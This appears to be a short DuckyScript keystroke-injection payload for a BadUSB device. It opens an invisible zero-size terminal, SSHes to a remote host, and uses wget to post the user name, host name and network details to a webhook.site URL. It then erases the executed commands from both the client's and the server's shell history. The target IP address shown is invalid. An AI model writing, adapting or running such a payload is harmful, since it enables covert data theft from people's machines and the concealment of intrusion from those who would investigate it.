REM 1) Connect to an SSH server by public key authorization in the xterm terminal with 1x1 size
REM 2) Send a webhook with some server's data, such as IP, Username, Hostname, etc.
REM 3) Delete last executed command from the server's & client's history files.

DELAY 1000
ALT F2
DELAY 200
REM STRING xterm -fg black -bg black -geometry 0x0+0+0
STRING gnome-terminal --geometry 0x0+0+0

REM CTRL ALT t
ENTER
DELAY 300

STRING ssh rootk@190.111.222.333
ENTER

STRING wget --post-data "d=$(whoami;hostname;ip a)" https://webhook.site/ae21cf97-02db-4fab-ab97-9e83820a8dea;history -d $((HISTCMD));exit;
DELAY 900
ENTER
DELAY 1100
STRING history -d $((HISTCMD-1));history -d $((HISTCMD)); exit
ENTER
